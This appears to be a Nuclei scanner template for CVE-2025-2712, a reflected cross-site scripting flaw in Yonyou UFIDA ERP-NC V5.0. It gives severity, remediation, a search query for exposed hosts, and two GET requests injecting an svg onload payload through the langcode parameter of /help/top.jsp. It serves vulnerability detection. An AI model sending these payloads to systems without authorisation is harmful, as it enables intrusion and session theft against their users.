id: CVE-2025-2712 info: name: Yonyou UFIDA ERP-NC V5.0 - Cross-Site Scripting author: ritikchaddha severity: medium description: | Yonyou UFIDA ERP-NC V5.0 is vulnerable to reflected cross-site scripting (XSS) via the langcode parameter in /help/systop.jsp and /help/top.jsp. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution. impact: | Attackers can inject malicious JavaScript through the langcode parameter in help pages, potentially stealing user credentials, session cookies, or executing unauthorized actions. remediation: | Upgrade to Yonyou UFIDA ERP-NC version 5.1 or later that properly sanitizes the langcode parameter. reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-2712 classification: epss-score: 0.00757 epss-percentile: 0.50221 cve-id: CVE-2025-2712 cwe-id: CWE-79 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cpe: cpe:2.3:a:yonyou:ufida_erp-nc:5.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: yonyou product: ufida_erp-nc fofa-query: icon_hash="1085941792" tags: cve,cve2025,xss,erp-nc,ufida,yonyou,vkev,vuln http: - method: GET path: - "{{BaseURL}}/help/top.jsp?langcode=1%22%3E%3Csvg%20onload=alert(document.domain)%3E" - "{{BaseURL}}/help/top.jsp?langcode=1%22%3E%3C/script%3E%3Csvg%20onload=alert(document.domain)%3E" stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - '.png)' - 'Search.jsp' condition: and - type: word part: content_type words: - 'text/html' - type: status status: - 200 # digest: 4b0a00483046022100f1ff70bfe8f80ef840960c55ef755cacb56fcf39ce1e45e5752b87cfe3be4bcc022100b39001d2586c0857eda849d6dd403b600dfff0a58e560c274dc4bdb9b893b2d8:922c64590222798bb761d5b6d8e72950